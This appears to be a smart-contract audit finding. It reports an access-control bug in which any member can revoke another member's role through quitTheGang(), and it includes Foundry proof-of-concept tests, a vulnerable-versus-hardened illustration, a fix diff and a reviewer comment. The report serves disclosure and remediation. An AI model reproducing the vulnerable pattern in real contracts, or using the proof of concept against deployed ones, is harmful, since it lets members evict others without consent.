Summary
Any gang member can make another gang member quit the gang without that member's consent.
Vulnerability Details
Any gang member can make another gang member quit the gang without that member's consent. quitTheGang(address account) only checks that the caller holds the gangmember role; it never checks that `account` is the caller.
Say there are two gang members, alice and bob. Alice can make bob quit the gang without bob's consent. Here is the PoC (Foundry test):
address alice = makeAddr("alice");
address bob = makeAddr("bob");

function test_quitGang() public {
    // the kernel admin gives godFather the gangmember role so he can recruit
    vm.prank(kernel.admin());
    kernel.grantRole(Role.wrap("gangmember"), godFather);

    // godFather adds alice and bob to the gang
    vm.prank(godFather);
    laundrette.addToTheGang(alice);
    vm.prank(godFather);
    laundrette.addToTheGang(bob);
    assertEq(kernel.hasRole(address(alice), Role.wrap("gangmember")), true);
    assertEq(kernel.hasRole(address(bob), Role.wrap("gangmember")), true);

    // alice, an ordinary member, removes bob without bob's consent
    vm.prank(alice);
    laundrette.quitTheGang(address(bob));
    assertEq(kernel.hasRole(address(bob), Role.wrap("gangmember")), false);
}
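To make the root cause and the fix concrete, here is an added, self-contained illustration (not the audited Laundrette/Kernel code). MiniKernel and Gang are simplified stand-ins: the role registry, the setPolicy() hook, the onlySelf modifier and the revert strings are all assumptions introduced here. The vulnerable shape mirrors the finding above (onlyRole gates msg.sender, the `account` argument is unconstrained); the hardened shape adds the account == msg.sender check that the recommendation asks for, and the Foundry test shows one failing and one passing under each.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Simplified role registry standing in for the real Kernel (assumption).
contract MiniKernel {
    address public immutable admin;
    address public policy; // the one contract allowed to grant/revoke besides admin
    mapping(address => mapping(bytes32 => bool)) private roles;

    constructor() { admin = msg.sender; }

    function setPolicy(address p) external {
        require(msg.sender == admin, "not admin");
        policy = p;
    }

    function grantRole(bytes32 role, address account) external {
        require(msg.sender == admin || msg.sender == policy, "not authorized");
        roles[account][role] = true;
    }

    function revokeRole(bytes32 role, address account) external {
        require(msg.sender == admin || msg.sender == policy, "not authorized");
        roles[account][role] = false;
    }

    function hasRole(address account, bytes32 role) external view returns (bool) {
        return roles[account][role];
    }
}

// Simplified policy standing in for Laundrette (assumption).
contract Gang {
    bytes32 public constant GANG = keccak256("gangmember");
    MiniKernel public immutable kernel;

    constructor(MiniKernel k) { kernel = k; }

    // Gates only the caller; it says nothing about the `account` argument.
    modifier onlyRole(bytes32 role) {
        require(kernel.hasRole(msg.sender, role), "missing role");
        _;
    }

    // The missing check: the account being acted on must be the caller.
    modifier onlySelf(address account) {
        require(account == msg.sender, "can only quit for yourself");
        _;
    }

    // Vulnerable shape: any member can revoke any other member's role.
    function quitTheGangVulnerable(address account) external onlyRole(GANG) {
        kernel.revokeRole(GANG, account);
    }

    // Hardened shape: a member can only revoke their own role.
    function quitTheGang(address account) external onlyRole(GANG) onlySelf(account) {
        kernel.revokeRole(GANG, account);
    }
}

contract GangTest is Test {
    MiniKernel kernel;
    Gang gang;
    address alice = makeAddr("alice");
    address bob = makeAddr("bob");

    function setUp() public {
        kernel = new MiniKernel();          // this test contract is the admin
        gang = new Gang(kernel);
        kernel.setPolicy(address(gang));
        kernel.grantRole(gang.GANG(), alice);
        kernel.grantRole(gang.GANG(), bob);
    }

    function test_vulnerable_letsMemberKickOthers() public {
        vm.prank(alice);
        gang.quitTheGangVulnerable(bob);    // alice removes bob
        assertFalse(kernel.hasRole(bob, gang.GANG()));
    }

    function test_fixed_rejectsKickingOthers() public {
        vm.prank(alice);
        vm.expectRevert("can only quit for yourself");
        gang.quitTheGang(bob);              // alice cannot remove bob
        assertTrue(kernel.hasRole(bob, gang.GANG()));

        vm.prank(bob);
        gang.quitTheGang(bob);              // bob can still leave on his own
        assertFalse(kernel.hasRole(bob, gang.GANG()));
    }
}
```

The point the test makes is that the role check on the caller and the ownership check on the argument are independent; onlyRole alone proves the caller is a member, not that the caller is the member being removed. If the design intends a privileged party (for example the godfather) to be able to remove members, that should be a separate, explicitly gated path rather than a side effect of quitTheGang().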
Impact
A malicious gang member can force every other member out of the gang.
Tools Used
Manual Review, Foundry
Recommendations
quitTheGang() should check that account == msg.sender, so that a member can only remove their own role.
- function quitTheGang(address account) external onlyRole("gangmember") {
+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert(account) {
kernel.revokeRole(Role.wrap("gangmember"), account);
}
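Review bot: the added `isAuthorizedOrRevert(account)` modifier on the `+` line is not shown anywhere in this report, while the sentence above says the condition should be `account == msg.sender`; either include the modifier's body so a reader can confirm it enforces exactly that, or make the check explicit in the function, e.g. `require(account == msg.sender, "not your role");` before the `kernel.revokeRole(...)` call. Also worth stating in the fix whether any privileged role is still meant to be able to remove other members, since the `onlyRole("gangmember")` on the caller alone is what allowed this bug.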